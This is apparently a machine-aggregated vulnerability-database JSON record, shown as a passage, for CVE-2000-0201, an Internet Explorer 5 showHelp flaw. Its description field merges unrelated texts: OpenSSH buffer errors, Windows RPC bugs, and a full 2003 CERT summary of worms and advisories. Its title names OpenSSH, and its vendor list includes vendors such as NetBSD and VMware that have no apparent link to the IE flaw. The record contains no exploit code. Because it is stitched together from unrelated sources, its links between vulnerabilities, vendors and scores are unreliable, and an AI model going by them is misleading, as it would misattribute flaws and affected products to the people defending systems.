"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "network appliance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nokia",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "riverstone",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "tfs",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix secure linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.0"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.01"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Posted to Bugtraq on March 1, 2000 by Georgi Guninski \u003cjoro@nat.bg\u003e.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
}
],
"trust": 0.6
},
"cve": "CVE-2000-0201",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2000-0201",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#333628",
"trust": 0.8,
"value": "28.98"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#483492",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#326746",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#254236",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CNNVD",
"id": "CNNVD-200003-002",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft\u0027s Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. There is a remote buffer overflow in many versions of Microsoft Windows that allows attackers to execute arbitrary code with system privileges. We are sending this message to help ensure that\nadministrators have not overlooked one or more of these vulnerabilities. \n\nThere have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues \n are exploitable, but they are resolved in version 3.7.1. These four additional \n flaws are believed to be relatively minor, and are scheduled to be\n included in the next version of OpenSSH. \n Exploitation of this vulnerability may lead to a remote attacker \n gaining privileged access to the server, in some cases root access. \n\nVU#209807 - Portable OpenSSH server PAM conversion stack corruption\nhttp://www.kb.cert.org/vuls/id/209807\n\n There is a vulnerability in portable versions of OpenSSH 3.7p1 and\n 3.7.1p1 that may permit an attacker to corrupt the PAM conversion\n stack. \n\nPlease check the vulnerability notes for resolutions and additional \ndetails. \n\nThank you. \n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Summary CS-2003-04\n\n November 24, 2003\n\n Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT\n Summary to draw attention to the types of attacks reported to our\n incident response team, as well as other noteworthy incident and\n vulnerability information. The summary includes pointers to sources of\n information for dealing with the problems. \n\n Past CERT summaries are available from:\n\n CERT Summaries\n http://www.cert.org/summaries/\n ______________________________________________________________________\n\nRecent Activity\n\n Since the last regularly scheduled CERT summary, issued in September\n 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft\n Windows Workstation Service, RPCSS Service, and Exchange. \n We have received reports of W32/Swen.A, W32/Mimail variants, and\n exploitation of an Internet Explorer vulnerability reported in August\n of 2003. \n\n For more current information on activity being reported to the\n CERT/CC, please visit the CERT/CC Current Activity page. The Current\n Activity page is a regularly updated summary of the most frequent,\n high-impact types of security incidents and vulnerabilities being\n reported to the CERT/CC. The information on the Current Activity page\n is reviewed and updated as reporting trends change. \n\n CERT/CC Current Activity\n http://www.cert.org/current/current_activity.html\n\n\n 1. W32/Mimail Variants\n\n The CERT/CC has received reports of several new variants of the\n \u0027Mimail\u0027 worm. The most recent variant of the worm (W32/Mimail.J)\n arrives as an email message alleging to be from the Paypal\n financial service. The message requests that the recipient\n \u0027verify\u0027 their account information to prevent the suspension of\n their Paypal account. Attached to the email is an executable file\n which captures this information (if entered), and sends it to a\n number of email addresses. \n\n Current Activity - November 19, 2003\n http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili\n\n\n 2. \n\n CERT Advisory CA-2003-28\n\t\tBuffer Overflow in Windows Workstation Service\n http://www.cert.org/advisories/CA-2003-28.html\n\n Vulnerability Note VU#567620\n\t\tMicrosoft Windows Workstation service vulnerable to \n\t\tbuffer overflow when sent specially crafted network\n\t\tmessage\n http://www.kb.cert.org/vuls/id/567620\n\n\n 3. \n\n CERT Advisory CA-2003-27\n\t\tMultiple Vulnerabilities in Microsoft Windows and \n\t\tExchange\n http://www.cert.org/advisories/CA-2003-27.html\n\n Vulnerability Note VU#575892\n\t\tBuffer overflow in Microsoft Windows Messenger Service\n http://www.kb.cert.org/vuls/id/575892\n\n Vulnerability Note VU#422156\n\t\tMicrosoft Exchange Server fails to properly handle\n\t\tspecially crafted SMTP extended verb requests\n http://www.kb.cert.org/vuls/id/422156\n\n Vulnerability Note VU#467036\n\t\tMicrosoft Windows Help and support Center contains buffer\n\t\toverflow in code used to handle HCP protocol\n http://www.kb.cert.org/vuls/id/467036\n\n Vulnerability Note VU#989932\n\t\tMicrosoft Windows contains buffer overflow in Local \n\t\tTroubleshooter ActiveX control (Tshoot.ocx)\n http://www.kb.cert.org/vuls/id/989932\n\n Vulnerability Note VU#838572\n\t\tMicrosoft Windows Authenticode mechanism installs ActiveX\n\t\tcontrols without prompting user\n http://www.kb.cert.org/vuls/id/838572\n\n Vulnerability Note VU#435444\n\t\tMicrosoft Outlook Web Access (OWA) contains cross-site\n\t\tscripting vulnerability in the \"Compose New Message\" form\n http://www.kb.cert.org/vuls/id/435444\n\n Vulnerability Note VU#967668\n\t\tMicrosoft Windows ListBox and ComboBox controls vulnerable\n\t\tto buffer overflow when supplied crafted Windows message\n http://www.kb.cert.org/vuls/id/967668\n\n\n 4. Multiple Vulnerabilities in SSL/TLS Implementations\n\n Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)\n and Transport Layer Security (TLS) protocols allowing an attacker\n to execute arbitrary code or cause a denial-of-service condition. \n\n CERT Advisory CA-2003-26\n\t\tMultiple Vulnerabilities in SSL/TLS Implementations\n http://www.cert.org/advisories/CA-2003-26.html\n\n Vulnerability Note VU#935264\n\t\tOpenSSL ASN.1 parser insecure memory deallocation\n http://www.kb.cert.org/vuls/id/935264\n\n Vulnerability Note VU#255484\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (1)\n http://www.kb.cert.org/vuls/id/255484\n\n Vulnerability Note VU#380864\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (2)\n http://www.kb.cert.org/vuls/id/380864\n\n Vulnerability Note VU#686224\n\t\tOpenSSL does not securely handle invalid public key when\n\t\tconfigured to ignore errors\n http://www.kb.cert.org/vuls/id/686224\n\n Vulnerability Note VU#732952\n\t\tOpenSSL accepts unsolicited client certificate messages\n http://www.kb.cert.org/vuls/id/732952\n\n Vulnerability Note VU#104280\n\t\tMultiple vulnerabilities in SSL/TLS implementations\n http://www.kb.cert.org/vuls/id/104280\n\n Vulnerability Note VU#412478\n\t\tOpenSSL 0.9.6k does not properly handle ASN.1 sequences\n http://www.kb.cert.org/vuls/id/412478\n\n\n 5. Exploitation of Internet Explorer Vulnerability\n\n The CERT/CC received a number of reports indicating that attackers\n were actively exploiting the Microsoft Internet Explorer\n vulnerability described in VU#865940. These attacks include the\n installation of tools for launching distributed denial-of-service\n (DDoS) attacks, providing generic proxy services, reading\n sensitive information from the Windows registry, and using a\n victim system\u0027s modem to dial pay-per-minute services. The\n vulnerability described in VU#865940 exists due to an interaction\n between IE\u0027s MIME type processing and the way it handles HTML\n application (HTA) files embedded in OBJECT tags. \n\n CERT Advisory IN-2003-04\n\t\tExploitation of Internet Explorer Vulnerability\n http://www.cert.org/incident_notes/IN-2003-04.html\n\n Vulnerability Note VU#865940\n\t\tMicrosoft Internet Explorer does not properly evaluate\n\t\t\"application/hta\" MIME type referenced by DATA attribute\n\t\tof OBJECT element\n http://www.kb.cert.org/vuls/id/865940\n\n\n 6. W32/Swen.A Worm\n\n On September 19, the CERT/CC began receiving a large volume of\n reports of a mass mailing worm, referred to as W32/Swen.A,\n spreading on the Internet. Similar to W32/Gibe.B in function, this\n worm arrives as an attachment claiming to be a Microsoft Internet\n Explorer Update or a delivery failure notice from qmail. The\n W32/Swen.A worm requires a user to execute the attachment either\n manually or by using an email client that will open the attachment\n automatically. Upon opening the attachment, the worm attempts to\n mail itself to all email addresses it finds on the system. The\n CERT/CC updated the current activity page to contain further\n information on this worm. \n\n Current Activity - September 19, 2003\n http://www.cert.org/current/archive/2003/09/19/archive.html#swena\n\n\n 7. Buffer Overflow in Sendmail\n\n Sendmail, a widely deployed mail transfer agent (MTA), contains a\n vulnerability that could allow an attacker to execute arbitrary\n code with the privileges of the sendmail daemon, typically root. \n\n CERT Advisory CA-2003-25\n\t\tBuffer Overflow in Sendmail\n http://www.cert.org/advisories/CA-2003-25.html\n\n Vulnerability Note VU#784980\n\t\tSendmail prescan() buffer overflow vulnerability\n http://www.kb.cert.org/vuls/id/784980\n\n\n 8. \n\n CERT Advisory CA-2003-23\n\t\tRPCSS Vulnerabilities in Microsoft Windows\n http://www.cert.org/advisories/CA-2003-23.html\n\n Vulnerability Note VU#483492\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM activation routines\n http://www.kb.cert.org/vuls/id/483492\n\n Vulnerability Note VU#254236\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM request filename handling\n http://www.kb.cert.org/vuls/id/254236\n\n Vulnerability Note VU#326746\n\t\tMicrosoft Windows RPC service vulnerable to \n\t\tdenial of service\n http://www.kb.cert.org/vuls/id/326746\n ______________________________________________________________________\n\nNew CERT Coordination Center (CERT/CC) PGP Key\n\n On October 15, the CERT/CC issued a new PGP key, which should be used\n when sending sensitive information to the CERT/CC. \n\n CERT/CC PGP Public Key\n https://www.cert.org/pgp/cert_pgp_key.asc\n\n Sending Sensitive Information to the CERT/CC\n https://www.cert.org/contact_cert/encryptmail.html\n ______________________________________________________________________\n\nWhat\u0027s New and Updated\n\n Since the last CERT Summary, we have published new and updated\n * Advisories\n http://www.cert.org/advisories/\n * Vulnerability Notes\n http://www.kb.cert.org/vuls\n * CERT/CC Statistics\n http://www.cert.org/stats/cert_stats.html\n * Congressional Testimony\n http://www.cert.org/congressional_testimony\n * Training Schedule\n http://www.cert.org/training/\n * CSIRT Development\n http://www.cert.org/csirts/\n ______________________________________________________________________\n\n This document is available from:\n http://www.cert.org/summaries/CS-2003-04.html\n ______________________________________________________________________\n\nCERT/CC Contact Information\n\n Email: cert@cert.org\n Phone: +1 412-268-7090 (24-hour hotline)\n Fax: +1 412-268-6989\n Postal address:\n CERT Coordination Center\n Software Engineering Institute\n Carnegie Mellon University\n Pittsburgh PA 15213-3890\n U.S.A. \n\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\n during other hours, on U.S. holidays, and on weekends. \n\nUsing encryption\n\n We strongly urge you to encrypt sensitive information sent by email. \n Our public PGP key is available from\n http://www.cert.org/CERT_PGP.key\n\n If you prefer to use DES, please call the CERT hotline for more\n information. \n\nGetting security information\n\n CERT publications and other security information are available from\n our web site\n http://www.cert.org/\n\n To subscribe to the CERT mailing list for advisories and bulletins,\n send email to majordomo@cert.org. Please include in the body of your\n message\n\n subscribe cert-advisory\n\n * \"CERT\" and \"CERT Coordination Center\" are registered in the U.S. \n Patent and Trademark Office. \n ______________________________________________________________________\n\n NO WARRANTY\n Any material furnished by Carnegie Mellon University and the Software\n Engineering Institute is furnished on an \"as is\" basis. Carnegie\n Mellon University makes no warranties of any kind, either expressed or\n implied as to any matter including, but not limited to, warranty of\n fitness for a particular purpose or merchantability, exclusivity or\n results obtained from use of the material. Carnegie Mellon University\n does not make any warranty of any kind with respect to freedom from\n patent, trademark, or copyright infringement. \n ______________________________________________________________________\n\n Conditions for use, disclaimers, and sponsorship information\n\n Copyright \\xa92003 Carnegie Mellon University. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 6.5.8\n\niQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78\n7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT\nrb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU\nUENALuNdthA=\n=DD60\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0201"
},
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
}
],
"trust": 3.96
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#326746",
"trust": 2.5
},
{
"db": "CERT/CC",
"id": "VU#254236",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#483492",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2000-0201",
"trust": 1.6
},
{
"db": "BID",
"id": "1033",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#333628",
"trust": 1.0
},
{
"db": "SECUNIA",
"id": "10156",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "VU#602204",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#209807",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31735",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#784980",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#575892",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#255484",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#865940",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#467036",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#380864",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#838572",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#422156",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#412478",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#935264",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#686224",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#104280",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#567620",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#989932",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#967668",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#435444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#732952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32268",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"id": "VAR-200003-0033",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-07-22T21:37:32.184000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-039.asp"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/326746"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=825750"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=827363"
},
{
"trust": 1.6,
"url": "http://www.cert.org/advisories/ca-2003-19.html"
},
{
"trust": 1.6,
"url": "http://cgi.nessus.org/plugins/dump.php3?id=11835"
},
{
"trust": 1.6,
"url": "http://www.iss.net/support/product_utilities/xfrpcss.php"
},
{
"trust": 1.6,
"url": "http://www.ntbugtraq.com/dcomrpc.asp"
},
{
"trust": 1.6,
"url": "http://securecomputing.stanford.edu/alerts/win-rpc-10sept2003.html"
},
{
"trust": 1.6,
"url": "http://www.coresecurity.com/common/showdoc.php?idx=393\u0026idxseccion=10"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/1033"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/254236"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/483492"
},
{
"trust": 0.8,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"trust": 0.8,
"url": "http://www.mindrot.org/pipermail/openssh-unix-announce/2003-september/000062.html"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/openssh/files/patch-buffer.c"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/10156/"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/advisories/ad20030910.html"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/tools/rpcdcom.html"
},
{
"trust": 0.8,
"url": "http://www.xfocus.org/advisories/200307/4.html"
},
{
"trust": 0.8,
"url": "http://www.nsfocus.com/english/homepage/research/0306.htm"
},
{
"trust": 0.2,
"url": "http://www.cert.org/"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/333628"
},
{
"trust": 0.2,
"url": "http://www.cert.org/cert_pgp.key"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/209807"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/jarl-5rfqqz."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/602204"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/cs-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/412478"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/567620"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/104280"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/686224"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/575892"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/732952"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/989932"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/09/19/archive.html#swena"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/"
},
{
"trust": 0.1,
"url": "http://www.cert.org/stats/cert_stats.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/784980"
},
{
"trust": 0.1,
"url": "http://www.cert.org/training/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/838572"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/967668"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/current_activity.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-28.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-27.html"
},
{
"trust": 0.1,
"url": "https://www.cert.org/contact_cert/encryptmail.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/incident_notes/in-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/435444"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-26.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-24.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-25.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-23.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/935264"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/467036"
},
{
"trust": 0.1,
"url": "https://www.cert.org/pgp/cert_pgp_key.asc"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/255484"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/865940"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/380864"
},
{
"trust": 0.1,
"url": "http://www.cert.org/congressional_testimony"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/422156"
},
{
"trust": 0.1,
"url": "http://www.cert.org/csirts/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-09-16T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2003-09-29T22:44:34",
"db": "PACKETSTORM",
"id": "31735"
},
{
"date": "2003-11-25T05:25:51",
"db": "PACKETSTORM",
"id": "32268"
},
{
"date": "2000-03-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"date": "2000-03-01T05:00:00",
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2005-05-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"date": "2021-07-23T12:18:31.047000",
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains buffer management errors",
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
}
],
"trust": 0.6
}
}
VAR-200107-0045
